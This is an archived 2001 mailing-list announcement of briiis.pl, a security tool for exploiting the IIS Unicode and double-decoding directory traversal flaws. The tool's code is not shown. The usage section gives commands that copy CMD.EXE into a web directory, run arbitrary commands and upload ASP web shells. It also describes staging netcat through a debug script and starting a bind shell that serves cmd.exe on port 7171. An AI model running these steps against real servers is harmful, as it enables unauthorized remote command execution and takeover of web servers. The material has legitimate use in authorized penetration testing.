iXsecurity.tool.briiis.3.02

From: ian.vitekat_private
Date: Wed Jun 13 2001 - 07:14:18 PDT

  • Next message: ian.vitekat_private: "iXsecurity.tool.briiis.3.02"

    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1
    
    iXsecurity Security Tool Release
    briiis.pl v3.02
    ================
    
    Tool Description
    - - ------------
    Briiis is a tool for testing web servers for "/" encoding
    break out from web root vulnerability from an executable
    directory.
    E.g. IIS Unicode and double encoding vulnerabilities.
    
    Special features
    - - ------------
    * Tests a lot of commonly executable directories if any
      of these directories is on the same disk as
      C:\WINNT\SYSTEM32\CMD.EXE
      Very easy to add even more directories
    * Caches the found directory
    * SSL support with SSLeay (Unix)
    * Easy to use text file upload
    * Easy to use / encoding option
    * Relative path name program execution
    * Virtual host support
    
    When to use briiis
    - - --------------
    Briiis should be used to test the IIS unicode or the IIS
    superfluous decoding vulnerability. Briiis can also be
    used to check for other "/" unicode or "/" decoding
    vulnerabilities where the goal is to break out from the
    web root from an executable directory to access CMD.EXE.
    
    How to use briiis
    - - -------------
    Test a server for the unicode vulnerability with the
    command:
    briiis.pl -s server
    
    Test the decoding vulnerability:
    briiis.pl -s server -F %255c
    
    Copy CMD.EXE to the web executable directory
    (Used for running commands and uploading files)
    briiis.pl -s server -x
    
    Run commands
    briiis.pl -s server -C "dir /a"
    
    Upload an ASP script to the executable directory
    (Like cmdasp.asp and upload.asp)
    briiis.pl -s server -u upload.asp
    
    Other options
    - - ---------
    The virtual host option, -H, is used when multiple web
    servers are bound to same IP and PORT. One case is for
    example reverse proxying.
    The standard "-s www.server.dom" sets the "Host:" header to:
    Host: www.server.dom
    If other virtual servers needs to be tested run:
    briiis.pl -s www.server.dom -H www.server2.dom
    
    Briiis creates a cache file named "<program_name>.cache".
    Delete the cache file if you want to run a new test after
    patching the server.
    
    The binary file upload does not work due to lack of
    privileges. If you want to test it:
    * Copy NC.EXE or something to NC.BIN
    * briiis.pl -s server -U NC.BIN -d -l c:\
    * There is now a NC.SCR, debug script, in c:\
    * With cmdasp.asp run
      debug < nc.scr
    * Start NC.BIN with cmdasp.asp
      c:\nc.bin -l -p 7171 -n -v -e cmd.exe
    The binary upload function can only handle small files.
    Use upload.asp or TFTP when uploading larger files.
    
    Background and more information
    - - ---------------------------
    Unicode vulnerability information:
    http://www.microsoft.com/technet/security/bulletin/MS00-078.asp
    Superfluous Decoding Vulnerability information:
    http://www.microsoft.com/technet/security/bulletin/MS01-026.asp
    
    TODO
    - -
    * Graphical interface (Planned Q4 2002)
    * Basic Authentication (Planned Q3 2001)
    
    - - ------------------------------------------------
    
    Ian Vitek, mailto:ian.vitekat_private
    
    - - ------------------------------------------------
    
    iXsecurity (former Infosec) is a Swedish and United
    Kingdom based tigerteam that have worked with computer-
    related security since 1982 and done technical security
    audits (pentests) since 1995.
    iXsecurity welcomes all new co-workers in Sweden
    and United Kingdom.
    
    - - ------------------------------------------------
    
    
    -----BEGIN PGP SIGNATURE-----
    Version: PGP 7.0.1
    
    iQA/AwUBOydnKY118uy6FU2iEQJttQCgvv2p/eLwoATBCHJwFGyglqTQg90An1jV
    WnyLpKEcIdhaDfeNKALz2rNG
    =FhpF
    -----END PGP SIGNATURE-----
    
    Briiis.pl
    =========
    
    (See attached file: briiis.pl)
    
    
    



    This archive was generated by hypermail 2b30 : Wed Jun 13 2001 - 10:13:50 PDT